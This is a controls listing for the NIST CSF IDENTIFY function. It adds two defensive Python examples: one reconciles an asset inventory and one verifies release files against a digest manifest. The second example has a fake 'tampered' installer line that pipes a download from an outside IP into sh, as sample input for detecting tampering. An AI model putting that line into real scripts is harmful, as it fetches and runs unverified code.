// Level 3 · Controls

IDENTIFY

NIST CSF IDENTIFY function: categories and subcategories, each tagged with this listing's priority rating. Note that the listing mixes framework versions: ID.AM (except ID.AM-06), ID.RA and ID.IM carry the CSF 2.0 subcategory text, while ID.AM-06, ID.BE, ID.GV, ID.RM and ID.SC are CSF 1.1 items that CSF 2.0 withdrew from IDENTIFY and folded into the new GOVERN function (ID.BE into GV.OC, ID.RM into GV.RM, ID.SC into GV.SC, ID.AM-06 into GV.RR-02, and the ID.GV outcomes across several GOVERN categories).

ID.AM · Medium
Asset Management

Assets (e.g., data, hardware, software, systems, facilities, services, people) that enable the organization to achieve business purposes are identified and managed consistent with their relative importance to organizational objectives and the organization's risk strategy

ID.AM-01 · Medium

Inventories of hardware managed by the organization are maintained

ID.AM-02 · Medium

Inventories of software, services, and systems managed by the organization are maintained
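The inventory outcomes in ID.AM-01 and ID.AM-02 are only met if the inventory is regularly reconciled against what is actually on the network. The following is an added example (not part of this page or of the NIST text) of that reconciliation in Python: an authoritative inventory (a CMDB export) is diffed against discovery data (scanner or endpoint-agent sightings), flagging assets seen but not inventoried, inventoried but never seen, not seen within the staleness window, and inventoried without an owner. The records, field names and the 30-day window are constructed assumptions.

```python
"""Reconcile an authoritative asset inventory against discovery data.

Added example; the input records, field names and the 30-day staleness
window are constructed assumptions, not data from any real inventory.
"""
from __future__ import annotations

from datetime import date, timedelta


def normalise_host(hostname: str) -> str:
    """Lower-case and drop the domain so 'WEB-01' and 'web-01.corp.example' match."""
    return hostname.strip().lower().split(".")[0]


def asset_key(serial: str | None, hostname: str) -> str:
    """Identity is the hardware serial when present (hostnames get reused and
    renamed); fall back to the normalised short hostname otherwise."""
    serial = (serial or "").strip().upper()
    return f"serial:{serial}" if serial else f"host:{normalise_host(hostname)}"


def reconcile(cmdb: list[dict], discovered: list[dict], today: date,
              stale_after_days: int = 30) -> dict[str, list[str]]:
    """Diff the inventory (what we think we have) against sightings (what sensors saw).

    Buckets:
      unknown    - seen on the network but absent from the inventory (shadow IT,
                   a rogue device, or an inventory gap: each needs a ticket)
      never_seen - inventoried but no sensor has ever reported it
      stale      - inventoried but the last sighting is older than the window
      unowned    - inventoried with no accountable owner
      current    - inventoried and seen within the window
    """
    inventory = {asset_key(a.get("serial"), a["hostname"]): a for a in cmdb}

    # Collapse multiple sightings of one asset to its most recent one.
    last_seen: dict[str, date] = {}
    for d in discovered:
        key = asset_key(d.get("serial"), d["hostname"])
        if key not in last_seen or d["last_seen"] > last_seen[key]:
            last_seen[key] = d["last_seen"]

    cutoff = today - timedelta(days=stale_after_days)
    report: dict[str, list[str]] = {
        "unknown": [], "never_seen": [], "stale": [], "unowned": [], "current": []}

    report["unknown"].extend(last_seen.keys() - inventory.keys())
    for key, asset in inventory.items():
        if not asset.get("owner"):
            report["unowned"].append(key)
        if key not in last_seen:
            report["never_seen"].append(key)
        elif last_seen[key] < cutoff:
            report["stale"].append(key)
        else:
            report["current"].append(key)
    return {bucket: sorted(keys) for bucket, keys in report.items()}


# Constructed sample data (assumed shapes of a CMDB export and a scanner export).
TODAY = date(2024, 6, 1)

CMDB = [
    {"hostname": "web-01.corp.example", "serial": "SN1001", "owner": "platform-team"},
    {"hostname": "db-01.corp.example", "serial": "SN1002", "owner": "data-team"},
    {"hostname": "legacy-fs", "serial": "SN0999", "owner": None},
]

DISCOVERED = [
    # endpoint agent reports the serial in lower case with a short hostname
    {"hostname": "WEB-01", "serial": "sn1001", "last_seen": TODAY},
    # a second sensor saw the same box earlier; the newer sighting must win
    {"hostname": "web-01.corp.example", "serial": "SN1001", "last_seen": TODAY - timedelta(days=3)},
    # the database box has not checked in for 40 days
    {"hostname": "db-01.corp.example", "serial": "SN1002", "last_seen": TODAY - timedelta(days=40)},
    # a host nobody registered, with no serial available from the scan
    {"hostname": "unreg-build-7.corp.example", "serial": "", "last_seen": TODAY},
]


def run_example() -> dict[str, list[str]]:
    return reconcile(CMDB, DISCOVERED, TODAY)


if __name__ == "__main__":
    for bucket, keys in run_example().items():
        print(f"{bucket:10s} {', '.join(keys) or '-'}")
```

Keying on serial rather than hostname is the design choice that matters: hostnames are reused when machines are rebuilt, so a hostname-only diff hides the case where a decommissioned record is silently satisfied by a new, unreviewed machine.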

ID.AM-03 · Medium

Representations of the organization's authorized network communication and internal and external network data flows are maintained

ID.AM-04 · Medium

Inventories of services provided by suppliers are maintained

ID.AM-05 · Medium

Assets are prioritized based on classification, criticality, resources, and impact on the mission

ID.AM-06 · Medium (CSF 1.1 text; withdrawn in CSF 2.0 and incorporated into GV.RR-02)

Cybersecurity roles and responsibilities for the entire workforce and third-party stakeholders (e.g., suppliers, customers, partners) are established

ID.AM-07 · Medium

Inventories of data and corresponding metadata for designated data types are maintained

ID.AM-08 · Medium

Systems, hardware, software, services, and data are managed throughout their life cycles

ID.BE · Medium (CSF 1.1 category; moved to GV.OC in CSF 2.0)
Business Environment

ID.BE-01 · Medium

The organization’s role in the supply chain is identified and communicated

ID.BE-02 · Medium

The organization’s place in critical infrastructure and its industry sector is identified and communicated

ID.BE-03 · Medium

Priorities for organizational mission, objectives, and activities are established and communicated

ID.BE-04 · Medium

Dependencies and critical functions for delivery of critical services are established

ID.BE-05 · Medium

Resilience requirements to support delivery of critical services are established for all operating states (e.g., under duress/attack, during recovery, normal operations)

ID.GV · Medium (CSF 1.1 category; its outcomes were moved into the GOVERN function in CSF 2.0)
Governance

ID.GV-01 · Medium

Organizational cybersecurity policy is established and communicated

ID.GV-02 · Medium

Cybersecurity roles and responsibilities are coordinated and aligned with internal roles and external partners

ID.GV-03 · Medium

Legal and regulatory requirements regarding cybersecurity, including privacy and civil liberties obligations, are understood and managed

ID.GV-04 · Medium

Governance and risk management processes address cybersecurity risks

ID.IM · Medium
Improvement

Improvements to organizational cybersecurity risk management processes, procedures and activities are identified across all CSF Functions

ID.IM-01 · Medium

Improvements are identified from evaluations

ID.IM-02 · Medium

Improvements are identified from security tests and exercises, including those done in coordination with suppliers and relevant third parties

ID.IM-03 · Medium

Improvements are identified from execution of operational processes, procedures, and activities

ID.IM-04 · Medium

Incident response plans and other cybersecurity plans that affect operations are established, communicated, maintained, and improved

ID.RA · Medium
Risk Assessment

The cybersecurity risk to the organization, assets, and individuals is understood by the organization

ID.RA-01 · Medium

Vulnerabilities in assets are identified, validated, and recorded

ID.RA-02 · Medium

Cyber threat intelligence is received from information sharing forums and sources

ID.RA-03 · Medium

Internal and external threats to the organization are identified and recorded

ID.RA-04 · Medium

Potential impacts and likelihoods of threats exploiting vulnerabilities are identified and recorded

ID.RA-05 · Medium

Threats, vulnerabilities, likelihoods, and impacts are used to understand inherent risk and inform risk response prioritization

ID.RA-06 · Medium

Risk responses are chosen, prioritized, planned, tracked, and communicated

ID.RA-07 · Medium

Changes and exceptions are managed, assessed for risk impact, recorded, and tracked

ID.RA-08 · Medium

Processes for receiving, analyzing, and responding to vulnerability disclosures are established

ID.RA-09 · Medium

The authenticity and integrity of hardware and software are assessed prior to acquisition and use
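ID.RA-09 asks that the integrity of software be assessed before use. For a downloaded release that means checking every artifact against the publisher's digest manifest (for example sha256sum output) whose own authenticity was established separately, typically by verifying its detached signature; a manifest fetched from the same server as the artifacts only detects corruption, not deliberate substitution. The following is an added example, not from this page or from NIST, that parses such a manifest and verifies a downloaded file set against it in Python, reporting tampered, missing and unlisted files. The release files and manifest are constructed inline, and signature verification of the manifest is assumed to have happened before this step.

```python
"""Verify a downloaded file set against a SHA-256 digest manifest.

Added example. The release contents are constructed inline; the manifest is
assumed to have come over a trusted channel (its detached signature already
verified), because a manifest fetched alongside the artifacts only catches
corruption, not a substituted release.
"""
from __future__ import annotations

import hashlib


def parse_manifest(text: str) -> dict[str, str]:
    """Parse `<64 hex chars>  <name>` lines as written by sha256sum.

    A leading '*' on the name marks binary mode in sha256sum output and is not
    part of the filename. Malformed lines are an error, not a skip: a manifest
    that fails to parse must fail verification rather than silently shrink.
    """
    expected: dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"manifest line {lineno}: expected '<digest>  <name>'")
        digest, name = parts[0].lower(), parts[1].strip()
        if name.startswith("*"):
            name = name[1:]
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"manifest line {lineno}: bad SHA-256 digest {digest!r}")
        if name in expected:
            raise ValueError(f"manifest line {lineno}: duplicate entry for {name!r}")
        expected[name] = digest
    return expected


def verify_artifacts(manifest_text: str, artifacts: dict[str, bytes]) -> dict[str, list[str]]:
    """Return per-file verdicts: ok, mismatch (tampered or corrupt), missing
    (listed but absent) and unlisted (present but not covered by the manifest)."""
    expected = parse_manifest(manifest_text)
    verdicts: dict[str, list[str]] = {"ok": [], "mismatch": [], "missing": [], "unlisted": []}
    for name, digest in expected.items():
        data = artifacts.get(name)
        if data is None:
            verdicts["missing"].append(name)
        elif hashlib.sha256(data).hexdigest() == digest:
            verdicts["ok"].append(name)
        else:
            verdicts["mismatch"].append(name)
    verdicts["unlisted"].extend(artifacts.keys() - expected.keys())
    return {k: sorted(v) for k, v in verdicts.items()}


def is_acceptable(verdicts: dict[str, list[str]]) -> bool:
    """Install only if nothing is tampered or missing. Unlisted files are not
    covered by the manifest, so they are not trusted either: refuse those too."""
    return not (verdicts["mismatch"] or verdicts["missing"] or verdicts["unlisted"])


# Constructed release as the publisher built it (assumed contents).
PUBLISHED = {
    "agent-1.4.2.tar.gz": b"\x1f\x8b\x08\x00tar-contents-of-the-agent",
    "install.sh": b"#!/bin/sh\nset -e\ntar xzf agent-1.4.2.tar.gz\n",
    "README.txt": b"Agent 1.4.2 release\n",
}
# sha256sum-style manifest as the publisher would sign and distribute it.
MANIFEST = "\n".join(f"{hashlib.sha256(data).hexdigest()}  {name}"
                     for name, data in PUBLISHED.items())

# What actually arrived: the installer was modified in transit, the README
# was dropped, and an extra file nobody signed for appeared.
DOWNLOADED = {
    "agent-1.4.2.tar.gz": PUBLISHED["agent-1.4.2.tar.gz"],
    "install.sh": b"#!/bin/sh\nset -e\ncurl -s http://198.51.100.7/x | sh\n",  # constructed tamper
    "extra.bin": b"\x00\x01\x02",
}


def run_example() -> dict[str, list[str]]:
    return verify_artifacts(MANIFEST, DOWNLOADED)


if __name__ == "__main__":
    result = run_example()
    for verdict, names in result.items():
        print(f"{verdict:9s} {', '.join(names) or '-'}")
    print("acceptable:", is_acceptable(result))
```

Two checks that ad hoc `sha256sum -c` invocations usually skip are worth keeping: a manifest that fails to parse must fail closed, and files present on disk but absent from the manifest are treated as untrusted rather than ignored.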

ID.RA-10 · Medium

Critical suppliers are assessed prior to acquisition

ID.RM · Medium (CSF 1.1 category; moved to GV.RM in CSF 2.0)
Risk Management Strategy

ID.RM-01 · Medium

Risk management processes are established, managed, and agreed to by organizational stakeholders

ID.RM-02 · Medium

Organizational risk tolerance is determined and clearly expressed

ID.RM-03 · Medium

The organization’s determination of risk tolerance is informed by its role in critical infrastructure and sector-specific risk analysis

ID.SC · Medium (CSF 1.1 category; moved to GV.SC in CSF 2.0)
Supply Chain Risk Management

ID.SC-01 · Medium

Cyber supply chain risk management processes are identified, established, assessed, managed, and agreed to by organizational stakeholders

ID.SC-02 · Medium

Suppliers and third-party partners of information systems, components, and services are identified, prioritized, and assessed using a cyber supply chain risk assessment process

ID.SC-03 · Medium

Contracts with suppliers and third-party partners are used to implement appropriate measures designed to meet the objectives of an organization’s cybersecurity program and Cyber Supply Chain Risk Management Plan

ID.SC-04 · Medium

Suppliers and third-party partners are routinely assessed using audits, test results, or other forms of evaluations to confirm they are meeting their contractual obligations

ID.SC-05 · Medium

Response and recovery planning and testing are conducted with suppliers and third-party providers